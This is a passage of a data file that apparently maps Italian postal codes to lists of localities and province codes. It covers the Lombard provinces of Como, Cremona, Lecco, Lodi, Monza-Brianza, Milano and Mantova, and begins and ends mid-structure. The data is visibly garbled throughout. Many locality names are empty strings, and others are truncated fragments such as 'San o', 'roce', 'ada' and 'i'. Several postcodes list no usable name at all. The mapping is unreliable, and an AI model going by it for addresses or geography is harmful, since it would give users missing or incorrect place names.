["Plesio", "CO"], ["", "CO"], ["Laglio", "CO"], ["Brienno", "CO"], ["Musso", "CO"], ["Albogasio", "CO"], ["", "CO"], ["Livo", "CO"], ["Montemezzo", "CO"], ["Calozzo", "CO"], ["Ossuccio", "CO"], ["Cusino", "CO"], ["Carlazzo", "CO"], ["Garzeno", "CO"], ["Acquaseria", "CO"], ["", "CO"], ["", "CO"], ["Cremia", "CO"], ["Oria", "CO"], ["", "CO"], ["Mezzegra", "CO"], ["", "CO"], ["Azzano", "CO"], ["Codogna", "CO"], ["", "CO"], ["Trezzone", "CO"], ["", "CO"], ["Colonno", "CO"], ["Sorico", "CO"], ["Argegno", "CO"], ["Moltrasio", "CO"], ["", "CO"], ["Valsolda", "CO"], ["Cavargna", "CO"], ["", "CO"], ["", "CO"], ["Sant'Abbondio", "CO"], ["Corrido", "CO"], ["", "CO"], ["", "CO"], ["Rezzonico", "CO"], ["", "CO"], ["", "CO"], ], "22011": [["Cadenabbia", "CO"], ["Griante", "CO"]], "22012": [["Cernobbio", "CO"]], "22013": [["Vercana", "CO"], ["Domaso", "CO"]], "22014": [["Dongo", "CO"]], "22015": [["Gravedona", "CO"]], "22016": [["Lenno", "CO"], ["Tremezzina", "CO"]], "22017": [["Menaggio", "CO"]], "22018": [["Porlezza", "CO"], ["Cima", "CO"]], "22019": [["Tremezzo", "CO"]], "22020": [ ["Nesso", "CO"], ["", "CO"], ["Pare'", "CO"], ["Schignano", "CO"], ["", "CO"], ["", "CO"], ["Veleso", "CO"], ["", "CO"], ["Lemna", "CO"], ["", "CO"], ["Boscone", "CO"], ["Pigra", "CO"], ["Zelbio", "CO"], ["Gaggino", "CO"], ["Blevio", "CO"], ["", "CO"], ["", "CO"], ["Laino", "CO"], ["Pellio", "CO"], ["Dizzasco", "CO"], ["Torno", "CO"], ["Camnago", "CO"], ["Faloppio", "CO"], ["Occagno", "CO"], ["Bizzarone", "CO"], ["Ponna", "CO"], ["Drezzo", "CO"], ], "22021": [["Bellagio", "CO"], ["", "CO"]], "22022": [["", "CO"]], "22023": [["", "CO"]], "22024": [["", "CO"], ["Scaria", "CO"]], "22025": [["Lezzeno", "CO"]], "22026": [["Maslianico", "CO"]], "22027": [["Ronago", "CO"]], "22028": [["Blessagno", "CO"], ["", "CO"]], "22029": [["", "CO"]], "22030": [ ["Lipomo", "CO"], ["Castelmarte", "CO"], ["Corneno", "CO"], ["Orsenigo", "CO"], ["Penzano", "CO"], ["Lasnigo", "CO"], ["", "CO"], ["Galliano", "CO"], ["Montorfano", "CO"], ["Rezzago", "CO"], ["Civenna", "CO"], ["Caglio", "CO"], ["Magreglio", "CO"], ["", "CO"], ["Barni", "CO"], ["Eupilio", "CO"], ["Pusiano", "CO"], ["Sormano", "CO"], ["Proserpio", "CO"], ], "22031": [["Albavilla", "CO"]], "22032": [["", "CO"]], "22033": [["Asso", "CO"]], "22034": [["Brunate", "CO"]], "22035": [["Canzo", "CO"]], 
"22036": [["Erba", "CO"], ["Arcellasco", "CO"]], "22037": [["", "CO"]], "22038": [["Tavernerio", "CO"], ["Solzago", "CO"]], "22039": [["Valbrona", "CO"], ["Osigo", "CO"]], "22040": [ ["Brenna", "CO"], ["", "CO"], ["", "CO"], ["Alserio", "CO"], ["Nobile", "CO"], ["", "CO"], ["", "CO"], ["Monguzzo", "CO"], ], "22041": [["Colverde", "CO"], ["", "CO"], ["Gironico", "CO"]], "22042": [["Cavallasca", "CO"]], "22043": [["Cagno", "CO"], ["Solbiate", "CO"]], "22044": [["Inverigo", "CO"], ["Cremnago", "CO"], ["", "CO"]], "22045": [["Lambrugo", "CO"]], "22046": [["Merone", "CO"]], "22060": [ ["Cabiate", "CO"], ["", "CO"], ["Cucciago", "CO"], ["", "CO"], ["Novedrate", "CO"], ["Montesolaro", "CO"], ["Arosio", "CO"], ["Carimate", "CO"], ["Carugo", "CO"], ], "22063": [ ["'", "CO"], ["", "CO"], ["'", "CO"], ["", "CO"], ["Cantu'", "CO"], ["'", "CO"], ], "22066": [["", "CO"], ["Perticato", "CO"]], "22069": [["Rovellasca", "CO"]], "22070": [ ["Luisago", "CO"], ["Bregnano", "CO"], ["Puginate", "CO"], ["Lucino", "CO"], ["", "CO"], ["", "CO"], ["Guanzate", "CO"], ["Portichetto", "CO"], ["", "CO"], ["", "CO"], ["Intimiano", "CO"], ["Rodero", "CO"], ["Capiago", "CO"], ["Minoprio", "CO"], ["", "CO"], ["Casnate", "CO"], ["Bulgarograsso", "CO"], ["", "CO"], ["Grandate", "CO"], ["", "CO"], ["", "CO"], ["Binago", "CO"], ["", "CO"], ["", "CO"], ["Carbonate", "CO"], ["Albiolo", "CO"], ["", "CO"], ["", "CO"], ["", "CO"], ["Beregazzo", "CO"], ["Concagno", "CO"], ["Montano", "CO"], ["Cirimido", "CO"], ["Valmorea", "CO"], ["", "CO"], ["", "CO"], ["", "CO"], ["Fenegro'", "CO"], ["", "CO"], ["Veniano", "CO"], ["Figliaro", "CO"], ["", "CO"], ], "22071": [["Bulgorello", "CO"], ["", "CO"], ["Cadorago", "CO"]], "22072": [["Cermenate", "CO"]], "22073": [["Andrate", "CO"], ["", "CO"], ["Molinetto", "CO"]], "22074": [["Lomazzo", "CO"], ["Manera", "CO"]], "22075": [["", "CO"]], "22076": [["Mozzate", "CO"]], "22077": [["", "CO"]], "22078": [["Turate", "CO"]], "22079": [["", "CO"]], "22100": [ ["", "CO"], ["Civiglio", "CO"], ["Breccia", "CO"], ["Lora", "CO"], ["Rebbio", "CO"], ["Camerlata", "CO"], ["Tavernola", "CO"], ["", "CO"], ["Albate", "CO"], ["Como", "CO"], ["", "CO"], ], "26010": [ ["", "CR"], ["", "CR"], ["Capralba", "CR"], ["", "CR"], ["Olmeneta", "CR"], ["", "CR"], ["", "CR"], ["Chieve", "CR"], ["", "CR"], ["Montodine", "CR"], ["Bolzone", "CR"], ["Salvirola", "CR"], ["Zappello", "CR"], ["Cremosano", "CR"], ["Credera", "CR"], ["Fiesco", "CR"], ["Dovera", "CR"], ["Moscazzano", "CR"], ["Sergnano", "CR"], ["Camisano", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["Casalsigone", "CR"], ["Ricengo", "CR"], ["Rovereto", "CR"], ["Castelvisconti", "CR"], ["Pianengo", "CR"], ["Offanengo", "CR"], ["Rubbiano", "CR"], ["Pozzaglio", "CR"], ["", "CR"], ["", "CR"], ["Capergnanica", "CR"], ["Izano", "CR"], ["", "CR"], ["Azzanello", "CR"], ["", "CR"], ], "26011": [["Casalbuttano", "CR"], ["Casalbuttano Ed Uniti", "CR"]], "26012": [["Castelleone", "CR"]], "26013": [ ["Crema", "CR"], ["Sairano", "CR"], ["Ombriano", "CR"], ["Santa ", "CR"], ["Sabbioni", "CR"], ], "26014": [["", "CR"], ["Romanengo", "CR"]], "26015": [["Soresina", "CR"]], "26016": [["", "CR"]], "26017": [["", "CR"], ["Quintano", "CR"], ["", "CR"], ["Pieranica", "CR"]], "26018": [["Trigolo", "CR"]], "26019": [["Vailate", "CR"]], "26020": [ ["", "CR"], ["Corte De' Cortesi Con Cignone", "CR"], ["Madignano", "CR"], ["", "CR"], ["Gombito", "CR"], ["Cignone", "CR"], ["Corte De' Cortesi", "CR"], ["Formigara", "CR"], ["Spinadesco", "CR"], 
["Bordolano", "CR"], ["Casalmorano", "CR"], ["Fengo", "CR"], ["Agnadello", "CR"], ["Ticengo", "CR"], ["", "CR"], ["", "CR"], ["Scannabue", "CR"], ["Genivolta", "CR"], ["", "CR"], ["", "CR"], ["San Bassano", "CR"], ], "26021": [["Barzaniga", "CR"], ["Annicco", "CR"]], "26022": [["", "CR"], ["Castelverde", "CR"], ["", "CR"]], "26023": [["Farfengo", "CR"], ["", "CR"], ["", "CR"]], "26024": [["", "CR"]], "26025": [["Pandino", "CR"], ["Nosadello", "CR"]], "26026": [["Pizzighettone", "CR"], ["Roggione", "CR"], ["Regona", "CR"]], "26027": [["", "CR"]], "26028": [["", "CR"], ["", "CR"], ["i", "CR"]], "26029": [["Gallignano", "CR"], ["Soncino", "CR"]], "26030": [ ["Spineda", "CR"], ["Gabbioneta", "CR"], ["", "CR"], ["", "CR"], ["Volongo", "CR"], ["Malagnino", "CR"], ["Cicognolo", "CR"], ["", "CR"], ["Calvatone", "CR"], ["Voltido", "CR"], ["Tornata", "CR"], ["", "CR"], ["Binanuova", "CR"], ["", "CR"], ["", "CR"], ["Casteldidone", "CR"], ["", "CR"], ], "26031": [["", "CR"]], "26032": [["Ostiano", "CR"]], "26033": [["", "CR"], ["", "CR"], ["Pescarolo", "CR"]], "26034": [["Piadena", "CR"], ["Drizzona", "CR"]], "26035": [["", "CR"]], "26036": [[" Ed Uniti", "CR"], ["", "CR"]], "26037": [["roce", "CR"]], "26038": [["", "CR"], ["", "CR"], ["", "CR"]], "26039": [["", "CR"], ["Vescovato", "CR"]], "26040": [ ["Gussola", "CR"], ["Derovere", "CR"], ["", "CR"], ["Bonemerse", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ["Castelponzone", "CR"], ["", "CR"], ["", "CR"], ["", "CR"], ], "26041": [ ["Casalbellotto", "CR"], ["Casalmaggiore", "CR"], ["Vicomoscano", "CR"], ["Roncadello", "CR"], ["Quattrocase", "CR"], ["Vicoboneghisio", "CR"], ["Agoiolo", "CR"], ["Vicobellignano", "CR"], ], "26042": [["", "CR"]], "26043": [["Persichello", "CR"], ["Dosimo", "CR"], ["", "CR"]], "26044": [["Grontardo", "CR"], ["Levata", "CR"]], "26045": [["", "CR"]], "26046": [["", "CR"]], "26047": [["", "CR"]], "26048": [["", "CR"], ["Sospiro", "CR"]], "26049": [["", "CR"]], "26100": [ ["", "CR"], ["Boschetto", "CR"], ["", "CR"], ["Migliaro", "CR"], ["Maristella", "CR"], ["Cremona", "CR"], ], "23801": [["Calolziocorte", "LC"], ["Rossino", "LC"]], "23802": [["Carenno", "LC"]], "23804": [["", "LC"]], "23805": [["Erve", "LC"]], "23806": [["", "LC"], ["", "LC"], ["Valcava", "LC"], ["Favirano", "LC"]], "23807": [["Merate", "LC"], ["", "LC"]], "23808": [["Vercurago", "LC"]], "23811": [["Ballabio", "LC"], ["Morterone", "LC"]], "23813": [["Cortenova", "LC"], ["Bindo", "LC"]], "23814": [["Cremeno", "LC"], ["Maggio", "LC"]], "23815": [["Introbio", "LC"]], "23816": [["Barzio", "LC"]], "23817": [["Moggio", "LC"], ["", "LC"]], "23818": [["Pasturo", "LC"]], "23819": [["Primaluna", "LC"], ["Cortabbio", "LC"]], "23821": [["Crebbio", "LC"], ["", "LC"]], "23822": [["Bellano", "LC"], ["Vestreno", "LC"]], "23823": [["", "LC"], ["Colico", "LC"]], "23824": [["Dervio", "LC"], ["Dorio", "LC"]], "23825": [["", "LC"]], "23826": [["", "LC"]], "23827": [["Lierna", "LC"]], "23828": [["Perledo", "LC"]], "23829": [["Fiumelatte", "LC"], ["Varenna", "LC"]], "23831": [["Casargo", "LC"]], "23832": [["Margno", "LC"], ["", "LC"]], "23833": [["Pagnona", "LC"]], "23834": [["Premana", "LC"]], "23835": [["Sueglio", "LC"], ["Introzzo", "LC"]], "23836": [["Tremenico", "LC"]], "23837": [["Taceno", "LC"], ["Parlasco", "LC"]], "23838": [["Vendrogno", "LC"]], "23841": [["", "LC"]], "23842": [["", "LC"]], "23843": [["Dolzago", "LC"]], "23844": [["Sirone", "LC"]], "23845": [["", "LC"], ["Camisasca", "LC"]], "23846": [["Brongio", "LC"], ["", "LC"]], "23847": [["Luzzana", "LC"], ["Molteno", 
"LC"]], "23848": [["Oggiono", "LC"], ["Ello", "LC"]], "23849": [["Rogeno", "LC"], ["Casletto", "LC"]], "23851": [["Galbiate", "LC"], ["", "LC"], ["", "LC"]], "23852": [["Garlate", "LC"]], "23854": [["Olginate", "LC"]], "23855": [["Pescate", "LC"]], "23857": [["Valgreghentino", "LC"]], "23861": [["", "LC"]], "23862": [["Civate", "LC"]], "23864": [["Malgrate", "LC"]], "23865": [["Limonta", "LC"], ["", "LC"], ["Onno", "LC"]], "23867": [["Suello", "LC"]], "23868": [["Caserta", "LC"], ["Valmadrera", "LC"]], "23870": [["", "LC"]], "23871": [["Lomagna", "LC"]], "23873": [["Missaglia", "LC"], ["Maresso", "LC"]], "23874": [["Montevecchia", "LC"], ["", "LC"]], "23875": [["Osnago", "LC"]], "23876": [["", "LC"]], "23877": [["", "LC"]], "23878": [["", "LC"]], "23879": [["", "LC"], ["Verderio", "LC"]], "23880": [ ["Campofiorenzo", "LC"], ["Casatenovo", "LC"], ["Galgiana", "LC"], ["Rimoldo", "LC"], ["Rogoredo", "LC"], ["Valaperta", "LC"], ["California", "LC"], ], "23881": [["Airuno", "LC"]], "23883": [["Beverate", "LC"], ["Brivio", "LC"]], "23884": [["Caraverio", "LC"], ["Cologna", "LC"], ["", "LC"]], "23885": [["Calco", "LC"], ["Arlate", "LC"]], "23886": [["", "LC"], ["Nava", "LC"]], "23887": [["Monticello", "LC"], ["Canova", "LC"], ["", "LC"]], "23888": [["", "LC"], ["Rovagnate", "LC"], ["Perego", "LC"]], "23889": [["'", "LC"]], "23890": [["Barzago", "LC"]], "23891": [["Barzano'", "LC"]], "23892": [["Bulciago", "LC"]], "23893": [["", "LC"]], "23894": [["Cremella", "LC"]], "23895": [["Cibrone", "LC"], ["Nibionno", "LC"], ["Tabiago", "LC"]], "23896": [["Sirtori", "LC"], ["", "LC"]], "23897": [["Vigano'", "LC"]], "23898": [["Imbersago", "LC"]], "23899": [["Robbiate", "LC"]], "23900": [["Lecco", "LC"]], "26811": [["", "LO"]], "26812": [["", "LO"], ["Casoni", "LO"]], "26813": [["Graffignana", "LO"]], "26814": [["Livraga", "LO"]], "26815": [["", "LO"], ["Massalengo", "LO"]], "26816": [["", "LO"]], "26817": [["ada", "LO"]], "26818": [["", "LO"], ["Bargano", "LO"]], "26821": [["Bertonico", "LO"]], "26822": [["Brembio", "LO"]], "26823": [["", "LO"], ["Camairago", "LO"]], "26824": [["", "LO"]], "26825": [["Basiasco", "LO"], ["Mairago", "LO"]], "26826": [["Secugnago", "LO"]], "26827": [["", "LO"]], "26828": [["Melegnanello", "LO"], ["", "LO"]], "26831": [["Cologno", "LO"], ["Casalmaiocco", "LO"]], "26832": [["", "LO"], ["Galgagnano", "LO"]], "26833": [["Comazzo", "LO"], ["Merlino", "LO"]], "26834": [["Cadilana", "LO"], ["", "LO"], ["", "LO"], ["Terraverde", "LO"]], "26835": [["Crespiatica", "LO"]], "26836": [["", "LO"]], "26837": [["Mulazzano", "LO"], ["", "LO"], ["Quartiano", "LO"]], "26838": [["", "LO"], ["Villavesco", "LO"], ["Tavazzano", "LO"]], "26839": [["", "LO"]], "26841": [["Casalpusterlengo", "LO"], ["Zorlesco", "LO"]], "26842": [["Cornovecchio", "LO"], ["", "LO"]], "26843": [["Maccastorna", "LO"], ["", "LO"], ["Meleti", "LO"]], "26844": [["Cavacurta", "LO"]], "26845": [["Codogno", "LO"]], "26846": [["", "LO"]], "26847": [["Maleo", "LO"]], "26848": [["", "LO"]], "26849": [["", "LO"]], "26851": [["", "LO"]], "26852": [["", "LO"], ["Mairano", "LO"]], "26853": [["", "LO"]], "26854": [["", "LO"], ["", "LO"], ["", "LO"]], "26855": [["", "LO"]], "26856": [["", "LO"], ["Mirabello", "LO"]], "26857": [["", "LO"]], "26858": [["Sordio", "LO"]], "26859": [["", "LO"]], "26861": [["Fombio", "LO"], ["Retegno", "LO"]], "26862": [["Guardamiglio", "LO"]], "26863": [["", "LO"]], "26864": [["", "LO"]], "26865": [["San o", "LO"]], "26866": [["", "LO"], ["Marudo", "LO"], ["", "LO"], ["Vidardo", "LO"]], "26867": [["Somaglia", 
"LO"], ["", "LO"]], "26900": [["", "LO"], ["Lodi", "LO"]], "20811": [["Binzago", "MB"], ["", "MB"], ["", "MB"], ["", "MB"]], "20812": [["", "MB"], ["", "MB"], ["Mombello", "MB"], ["Limbiate", "MB"]], "20813": [["Masciago", "MB"], ["Bovisio-Masciago", "MB"], ["Bovisio", "MB"]], "20814": [["Valera", "MB"], ["Varedo", "MB"]], "20815": [["Cogliate", "MB"]], "20816": [["", "MB"], ["", "MB"]], "20821": [["Meda", "MB"]], "20822": [["Baruccana", "MB"], ["Seveso", "MB"]], "20823": [["", "MB"], ["Cimnago", "MB"], ["Camnago", "MB"]], "20824": [["Lazzate", "MB"]], "20825": [["Barlassina", "MB"]], "20826": [["Misinto", "MB"], ["", "MB"]], "20831": [["Seregno", "MB"]], "20832": [["Desio", "MB"]], "20833": [["", "MB"], ["Paina", "MB"], ["Giussano", "MB"]], "20834": [["", "MB"]], "20835": [["Muggio'", "MB"], ["Taccona", "MB"]], "20836": [["Capriano", "MB"], ["Briosco", "MB"], ["Fornaci", "MB"]], "20837": [["", "MB"]], "20838": [["Renate", "MB"]], "20841": [["", "MB"], ["Agliate", "MB"]], "20842": [["", "MB"], ["", "MB"], ["Zoccorino", "MB"]], "20843": [["", "MB"]], "20844": [["Tregasio", "MB"], ["Triuggio", "MB"], ["Canonica", "MB"]], "20845": [["Sovico", "MB"]], "20846": [["Macherio", "MB"]], "20847": [["Albiate", "MB"]], "20851": [["Santa Margherita", "MB"], ["Lissone", "MB"]], "20852": [["Villasanta", "MB"]], "20853": [["Biassono", "MB"]], "20854": [["", "MB"]], "20855": [["Peregallo", "MB"], ["Lesmo", "MB"]], "20856": [["Correzzana", "MB"]], "20857": [["Camparada", "MB"]], "20861": [["Brugherio", "MB"], ["San Damiano", "MB"]], "20862": [["Arcore", "MB"]], "20863": [["Concorezzo", "MB"]], "20864": [["", "MB"], ["Omate", "MB"]], "20865": [["Velate", "MB"], ["Usmate Velate", "MB"]], "20866": [["Carnate", "MB"]], "20867": [["Caponago", "MB"]], "20871": [["Velasca", "MB"], ["Vimercate", "MB"], ["Oreno", "MB"]], "20872": [["", "MB"], ["Colnago", "MB"], ["", "MB"]], "20873": [["", "MB"]], "20874": [["Busnago", "MB"]], "20875": [["", "MB"]], "20876": [["Ornago", "MB"]], "20877": [["Roncello", "MB"]], "20881": [["Villanova", "MB"], ["Bernareggio", "MB"]], "20882": [["Bellusco", "MB"]], "20883": [["Mezzago", "MB"]], "20884": [["Sulbiate", "MB"]], "20885": [["", "MB"]], "20886": [["Aicurzio", "MB"]], "20900": [["San Fruttuoso", "MB"], ["Monza", "MB"]], "20001": [["Inveruno", "MI"]], "20002": [["Ossona", "MI"]], "20003": [["Casorezzo", "MI"]], "20004": [["Arluno", "MI"]], "20005": [["P", "MI"]], "20006": [["", "MI"]], "20007": [["Cornaredo", "MI"]], "20008": [["Bareggio", "MI"]], "20009": [["Vittuone", "MI"]], "20010": [ ["Mesero", "MI"], ["", "MI"], ["Rogorotto", "MI"], ["", "MI"], ["", "MI"], ["Casate", "MI"], ["Mantegazza", "MI"], ["", "MI"], ["Furato", "MI"], ["Buscate", "MI"], ["", "MI"], ["Casone", "MI"], ], "20011": [["Corbetta", "MI"], ["Battuello", "MI"], ["Cerello", "MI"]], "20012": [["Cuggiono", "MI"]], "20013": [["Ponte Nuovo", "MI"], ["Magenta", "MI"]], "20014": [["Nerviano", "MI"], ["", "MI"]], "20015": [["Parabiago", "MI"], ["Villastanza", "MI"]], "20016": [["Pero", "MI"], ["Cerchiate", "MI"]], "20017": [ ["Lucernate", "MI"], ["", "MI"], ["Terrazzano", "MI"], ["Passirana", "MI"], ["Rho", "MI"], ], "20018": [["Sedriano", "MI"]], "20019": [["Vighignolo", "MI"], ["", "MI"]], "20020": [ ["", "MI"], ["Bienate", "MI"], ["", "MI"], ["Vanzaghello", "MI"], ["Magnago", "MI"], ["Arconate", "MI"], ["Nosate", "MI"], ["Barbaiana", "MI"], ["", "MI"], ], "20021": [["Baranzate", "MI"], ["", "MI"], ["Bollate", "MI"]], "20022": [["", "MI"]], "20023": [["Cantalupo", "MI"], ["", "MI"]], "20024": [["", "MI"], ["", 
"MI"]], "20025": [["Legnano", "MI"]], "20026": [["", "MI"]], "20027": [["Rescalda", "MI"], ["Rescaldina", "MI"]], "20028": [["", "MI"]], "20029": [["Turbigo", "MI"]], "20030": [["Senago", "MI"]], "20031": [["Cesate", "MI"]], "20032": [["Cormano", "MI"], ["Brusuglio", "MI"], ["Ospitaletto", "MI"]], "20033": [["Solaro", "MI"]], "20034": [["", "MI"]], "20035": [["", "MI"]], "20036": [["Dairago", "MI"]], "20037": [["", "MI"], ["", "MI"]], "20038": [["", "MI"]], "20039": [["Canegrate", "MI"]], "20040": [["", "MI"], ["", "MI"], ["Cambiago", "MI"]], "20041": [["Bussero", "MI"]], "20042": [["", "MI"]], "20043": [["Vanzago", "MI"]], "20044": [["Arese", "MI"]], "20045": [["Lainate", "MI"]], "20046": [["Cisliano", "MI"]], "20047": [["Cusago", "MI"]], "20048": [["Pantigliate", "MI"]], "20049": [["Settala", "MI"]], "20050": [["Liscate", "MI"]], "20051": [["", "MI"]], "20052": [["Vignate", "MI"]], "20053": [["Rodano", "MI"]], "20054": [["Segrate", "MI"]], "20055": [["Vimodrone", "MI"]], "20056": [["Concesa", "MI"], ["", "MI"], ["Grezzago", "MI"]], "20057": [["Assago", "MI"]], "20058": [["", "MI"]], "20059": [["Casarile", "MI"]], "20060": [ ["Trecella", "MI"], ["Triginto", "MI"], ["", "MI"], ["", "MI"], ["", "MI"], ["Bustighera", "MI"], ["Gessate", "MI"], ["", "MI"], ["Truccazzano", "MI"], ["", "MI"], ["", "MI"], ["Masate", "MI"], ["Mombretto", "MI"], ["", "MI"], ["Basiano", "MI"], ["Albignano", "MI"], ["Bornago", "MI"], ["", "MI"], ["Vigliano", "MI"], ["Balbiano", "MI"], ], "20061": [["Carugate", "MI"]], "20062": [["", "MI"], ["", "MI"], ["", "MI"]], "20063": [["", "MI"]], "20064": [["Gorgonzola", "MI"]], "20065": [["Inzago", "MI"]], "20066": [["Melzo", "MI"]], "20067": [["Paullo", "MI"], ["Tribiano", "MI"]], "20068": [ ["Mezzate", "MI"], ["", "MI"], ["Bettola", "MI"], ["", "MI"], ["Zeloforomagno", "MI"], ["Bellaria", "MI"], ["", "MI"], ["Linate", "MI"], ], "20069": [["'Adda", "MI"]], "20070": [ ["Dresano", "MI"], ["Cerro Al Lambro", "MI"], ["San Zenone Al Lambro", "MI"], ["Sarmazzano", "MI"], ["", "MI"], ["", "MI"], ["Riozzo", "MI"], ], "20071": [["", "MI"], ["Vermezzo", "MI"]], "20072": [["", "MI"]], "20073": [["Opera", "MI"]], "20074": [["Carpiano", "MI"]], "20075": [["Colturano", "MI"]], "20076": [["Mediglia", "MI"]], "20077": [["Melegnano", "MI"]], "20078": [["San Colombano Al Lambro", "MI"]], "20079": [["Basiglio", "MI"]], "20080": [ ["Calvignasco", "MI"], ["San Pietro Cusico", "MI"], ["Bubbiano", "MI"], ["Moirago", "MI"], ["Besate", "MI"], ["Moncucco", "MI"], ["Ozzero", "MI"], ["Pasturago", "MI"], ["Albairate", "MI"], ["Badile", "MI"], ["Vernate", "MI"], ], "20081": [["", "MI"], ["Abbiategrasso", "MI"], ["Morimondo", "MI"]], "20082": [["Noviglio", "MI"], ["Binasco", "MI"], ["Santa Corinna", "MI"]], "20083": [["San Vito", "MI"], ["Gaggiano", "MI"], ["Vigano", "MI"]], "20084": [["Lacchiarella", "MI"]], "20085": [["Locate Di Triulzi", "MI"]], "20086": [["", "MI"]], "20087": [["", "MI"], ["", "MI"], ["Casterno", "MI"]], "20088": [["Rosate", "MI"], ["", "MI"]], "20089": [["Rozzano", "MI"], ["", "MI"]], "20090": [ ["Sporting Mirasole", "MI"], ["Trezzano Sul Naviglio", "MI"], ["", "MI"], ["Noverasco", "MI"], ["", "MI"], ["Lucino", "MI"], ["Caleppio", "MI"], ["", "MI"], ["Zingone", "MI"], ["Zingone Di Trezzano Sul Naviglio", "MI"], ["Premenugo", "MI"], ["Novegro", "MI"], ["Tregarezzo", "MI"], ["Monzoro", "MI"], ["Fizzonasco", "MI"], ["", "MI"], ["Millepini", "MI"], ["Buccinasco", "MI"], ], "20091": [["Bresso", "MI"]], "20092": [["", "MI"]], "20093": [["", "MI"], ["", "MI"]], "20094": [["Corsico", "MI"]], 
"20095": [["Milanino", "MI"], ["", "MI"]], "20096": [["Pioltello", "MI"], ["Limito", "MI"], ["Seggiano", "MI"]], "20097": [["San ", "MI"], ["Poasco", "MI"], ["Metanopoli", "MI"], ["Sorigherio", "MI"]], "20098": [["", "MI"], ["", "MI"], ["", "MI"]], "20099": [["", "MI"]], "20121": [["Milano", "MI"]], "20122": [["Milano", "MI"]], "20123": [["Milano", "MI"]], "20124": [["Milano", "MI"]], "20125": [["Milano", "MI"], ["Greco", "MI"], ["Gorla", "MI"], ["Precotto", "MI"]], "20126": [["Milano", "MI"]], "20127": [["Milano", "MI"], ["Crescenzago", "MI"]], "20128": [["Milano", "MI"]], "20129": [["Milano", "MI"]], "20131": [["Milano", "MI"]], "20132": [["Milano", "MI"]], "20133": [["Milano", "MI"]], "20134": [["Lambrate", "MI"], ["Milano", "MI"]], "20135": [["Milano", "MI"]], "20136": [["Milano", "MI"]], "20137": [["Milano", "MI"]], "20138": [["Milano", "MI"], ["Rogoredo", "MI"]], "20139": [["Milano", "MI"], ["", "MI"]], "20141": [["Milano", "MI"]], "20142": [["Milano", "MI"], ["Gratosoglio", "MI"]], "20143": [["Barona", "MI"], ["Milano", "MI"]], "20144": [["Milano", "MI"]], "20145": [["Milano", "MI"]], "20146": [["Milano", "MI"]], "20147": [["Milano", "MI"]], "20148": [["Milano", "MI"]], "20149": [["Milano", "MI"]], "20151": [["Milano", "MI"], ["Musocco", "MI"]], "20152": [["Baggio", "MI"], ["Milano", "MI"]], "20153": [["Milano", "MI"], ["Figino", "MI"], ["Trenno", "MI"]], "20154": [["Milano", "MI"]], "20155": [["Milano", "MI"]], "20156": [["Milano", "MI"]], "20157": [["Milano", "MI"], ["Vialba", "MI"], ["", "MI"]], "20158": [["Milano", "MI"]], "20159": [["Milano", "MI"]], "20161": [["Milano", "MI"], ["Bruzzano", "MI"], ["Affori", "MI"]], "20162": [["Niguarda", "MI"], ["Milano", "MI"]], "46010": [ ["", "MN"], ["", "MN"], ["Redondesco", "MN"], ["Belforte", "MN"], ["Grazie", "MN"], ["Curtatone", "MN"], ["", "MN"], ["Cesole", "MN"], ["Gazzuolo", "MN"], ["Campitello", "MN"], ["Montanara", "MN"], ["Commessaggio", "MN"], ["Buscoldo", "MN"], ["", "MN"], ["Casatico", "MN"], ["Canicossa", "MN"], ["Gabbiana", "MN"], ["Ospitaletto", "MN"], ["Levata", "MN"], ["Marcaria", "MN"], ["", "MN"], ], "46011": [["", "MN"], ["Mosio", "MN"]], "46012": [["Bozzolo", "MN"]], "46013": [["", "MN"]], "46014": [["Sarginesco", "MN"], ["", "MN"], ["Castellucchio", "MN"]], "46017": [["", "MN"], ["", "MN"]], "46018": [["", "MN"], ["Ponteterra", "MN"], ["", "MN"], ["Sabbioneta", "MN"]], "46019": [ ["Cogozzo", "MN"], ["Cicognara", "MN"], ["", "MN"], ["Buzzoletto", "MN"], ["Viadana", "MN"], ["Cizzolo", "MN"], ["Bellaguarda", "MN"], ], "46020": [ ["Polesine", "MN"], ["", "MN"], ["", "MN"], ["Magnacavallo", "MN"], ["Motteggiana", "MN"], ["", "MN"], ["", "MN"], ["", "MN"], ["Quingentole", "MN"], ["Schivenoglia", "MN"], ["Pegognaga", "MN"], ], "46021": [["", "MN"], ["", "MN"]], "46022": [["Felonica", "MN"]], "46023": [["", "MN"], ["Palidano", "MN"], ["Gonzaga", "MN"]], "46024": [["Bondanello", "MN"], ["Moglia", "MN"]], "46025": [["", "MN"]], "46026": [["Quistello", "MN"], ["Nuvolato", "MN"]], "46027": [["Portiolo", "MN"], ["San Benedetto Po", "MN"], ["Mirasole", "MN"], ["San Siro", "MN"]], "46028": [ ["", "MN"], ["Sermide", "MN"], ["Caposotto", "MN"], ["", "MN"], ["Malcantone", "MN"], ], "46029": [ ["Sailetto", "MN"], ["Tabellano", "MN"], ["Riva", "MN"], ["Brusatasso", "MN"], ["Suzzara", "MN"], ["San Prospero", "MN"], ], "46030": [ ["Gazzo", "MN"], ["Dosolo", "MN"], ["Correggioverde", "MN"], ["Mottella", "MN"], ["Stradella", "MN"], ["Tripoli", "MN"], ["Sacchetta", "MN"], ["", "MN"], ["Pomponesco", "MN"], ["Sustinente", "MN"], 
["Villastrada", "MN"], ["", "MN"], ["", "MN"], ["Libiola", "MN"], ], "46031": [["San Nicolo' Po", "MN"], ["San Biagio", "MN"], ["Bagnolo San Vito", "MN"]], "46032": [["Castelbelforte", "MN"]], "46033": [["", "MN"]], "46034": [ ["Boccadiganda", "MN"], ["", "MN"], ["Borgoforte", "MN"], ["Cerese", "MN"], ["Virgilio", "MN"], ["Romanore", "MN"], ["Pietole", "MN"], ["", "MN"], ["Cappelletta", "MN"], ], "46035": [["Ostiglia", "MN"], ["Correggioli", "MN"]], "46036": [["Revere", "MN"]], "46037": [ ["Casale", "MN"], ["Barbasso", "MN"], ["Roncoferraro", "MN"], ["", "MN"], ["Pontemerlano", "MN"], ["", "MN"], ["Governolo", "MN"], ], "46039": [["Villimpenta", "MN"]], "46040": [ ["", "MN"], ["", "MN"], ["", "MN"], ["Ceresara", "MN"], ["", "MN"], ["Rivalta", "MN"], ["Casalromano", "MN"], ["", "MN"], ["Rodigo", "MN"], ["Monzambano", "MN"], ["Guidizzolo", "MN"], ["Cavriana", "MN"], ["Solferino", "MN"], ["Casalmoro", "MN"], ["Piubega", "MN"], ["Casaloldo", "MN"], ], "46041": [["Castelnuovo Asolano", "MN"], ["Asola", "MN"], 